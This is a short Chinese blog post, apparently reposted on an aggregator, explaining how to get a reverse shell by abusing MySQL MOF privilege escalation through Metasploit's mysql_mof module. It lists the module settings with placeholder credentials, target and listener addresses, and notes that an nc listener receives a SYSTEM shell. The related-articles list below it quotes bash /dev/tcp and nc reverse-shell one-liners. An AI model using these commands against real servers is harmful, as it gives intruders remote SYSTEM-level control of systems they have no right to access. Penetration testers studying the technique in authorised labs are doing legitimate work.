mysql mof+metasploit反弹shell

2024-04-02 19:04:59 576人浏览泡泡鱼

摘要

鉴于上篇文章 Http://z2ppp.blog.51cto.com/11186185/1975985 Mysql mof提权metasploit已经有针对该方式的利用代码，原理还是一样

鉴于上篇文章 Http://z2ppp.blog.51cto.com/11186185/1975985 Mysql mof提权

metasploit已经有针对该方式的利用代码，原理还是一样生成mof文件，只是metasploit中可以使用到反弹技术，就不用额外添加用户，前提是对方服务器允许访问公网

use exploit/windows/mysql/mysql_mof
set passWord xxx    //设置登录mysql的密码
set username xxx    //设置登录mysql的用户
set rhost xxx       //设置要登录的ip地址
set rport xxxx      //设置mysql的端口号
set payload windows/shell_reverse_tcp    //所使用的反弹模块
set lhost xxx       //反弹到的ip地址
set lport xxx       //反弹到的端口
show options        //设置完成后，使用该命令可查看设置参数情况
exploit             //执行

mysql mof+metasploit反弹shell

如没问题，即exploit执行

这边我们使用nc监听对应端口号，就可以接收到shell了，通常情况为system权限，因为mof文件是由system执行

mysql mof+metasploit反弹shell

错误之处，敬请指正

您可能感兴趣的文档:

--结束END--

本文标题: mysql mof+metasploit反弹shell

本文链接: https://lsjlt.com/news/38572.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

猜你喜欢

mysql mof+metasploit反弹shell

鉴于上篇文章 http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof提权metasploit已经有针对该方式的利用代码，原理还是一样...

99+

2024-04-02
反弹shell脚本（php-reverse-shell）

平时经常打靶机这里贴一个反弹shell的脚本 array("pipe", "r"), // stdin is a pipe that the child will read from 1 ...

99+

2023-10-12

php 反弹shell
NC如何反弹shell

这篇文章给大家分享的是有关NC如何反弹shell的内容。小编觉得挺实用的，因此分享给大家做个参考，一起跟随小编过来看看吧。假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统，ip为：192.168.0.4，开放7777端口...

99+

2023-06-09
Python3实现——反弹shell

一、演示一下反弹shell的效果0、看一下python版本1、我们这边是服务端客户端连接后就可以输入命令了，比如下面截图中输入的pwd2、目标机是客户端，输入ip和端口二、代码+注释0、服务端1、客户端...

99+

2023-01-31

shell
linux反弹shell的原理详解

完整命令反弹shell命令： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tFuWHREZxoFcp/ip/port...

99+

2022-06-04

linux反弹shell
反弹shell的姿势有哪些

这篇文章主要介绍反弹shell的姿势有哪些，文中介绍的非常详细，具有一定的参考价值，感兴趣的小伙伴们一定要看完！Linux 反弹shell姿势一：bash反弹bash -i >& /dev/tcp...

99+

2023-06-20
浅析Linux之bash反弹shell原理

环境攻击机：kali ip：192.168.25.144 靶机：centos ...

99+

2022-06-03

Linux bash反弹shell Linux 反弹shell
Linux下NC反弹shell命令（推荐）

本机开启监听： nc -lvnp 4444 nc -vvlp 4444 目标机器开启反弹 bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ...

99+

2022-06-04

命令 Linux NC
反弹shell的几种姿势小结

目录linux 反弹shell Windows反弹shell在渗透过程中，往往因为端口限制而无法直连目标机器，此时需要通过反弹shell来获取一个交互式shell，以便继续深入。反弹shell是打开内网通道的...

99+

2022-06-04

反弹shell
Linux的反弹shell命令的解析

这篇文章主要介绍“Linux的反弹shell命令的解析”，在日常操作中，相信很多人在Linux的反弹shell命令的解析问题上存在疑惑，小编查阅了各式资料，整理出简单好用的操作方法，希望对大家解答”Linux的反弹shell命令的解析”的疑...

99+

2023-06-16
详解NC反弹shell的几种方法

假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统，ip为：192.168.0.4，开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shell u...

99+

2022-06-04

NC反弹shell
linux中反弹shell的原理是什么

这期内容当中小编将会给大家带来有关linux中反弹shell的原理是什么，文章内容丰富且以专业的角度为大家分析和叙述，阅读完这篇文章希望大家可以有所收获。什么是Linux系统Linux是一种免费使用和自由传播的类UNIX操作系统，是一个基于...

99+

2023-06-09
Linux之bash反弹shell原理是什么

这篇文章将为大家详细讲解有关Linux之bash反弹shell原理是什么，小编觉得挺实用的，因此分享给大家做个参考，希望大家阅读完这篇文章后可以有所收获。什么是Linux系统Linux是一种免费使用和自由传播的类UNIX操作系统，是一个基于...

99+

2023-06-09
Tomcat弱口令复现及利用(反弹shell)

目录漏洞描述复现环境攻击流程利用msf利用反弹shell利用参考文章漏洞描述 Tomcat有一个管理后台，其用户名和密码在Tomcat安装目录下的conf\tomcat-users....

99+

2024-04-02
Linux下反弹CmdLine Shell小技巧有哪些

这篇文章主要为大家展示了“Linux下反弹CmdLine Shell小技巧有哪些”，内容简而易懂，条理清晰，希望能够帮助大家解决疑惑，下面让小编带领大家一起研究并学习一下“Linux下反弹CmdLine Shell小技巧有哪些”这篇文章吧。...

99+

2023-06-17
Linux下NC反弹shell命令的使用方法

小编给大家分享一下Linux下NC反弹shell命令的使用方法，相信大部分人都还不怎么了解，因此分享这篇文章给大家参考一下，希望大家阅读完这篇文章后大有收获，下面让我们一起去了解一下吧！什么是Linux系统Linux是一种免费使用和自由传播...

99+

2023-06-09
【甄选靶场】Vulnhub百个项目渗透——项目五十四：jarbas-1（类git反弹shell,计划任务提权）

Vulnhub百个项目渗透 Vulnhub百个项目渗透——项目五十四：jarbas-1（类git反弹shell,计划任务提权） 🔥系列专栏：Vulnhub百个项目渗透 Ἰ...

99+

2023-08-31

git php 服务器渗透测试系统安全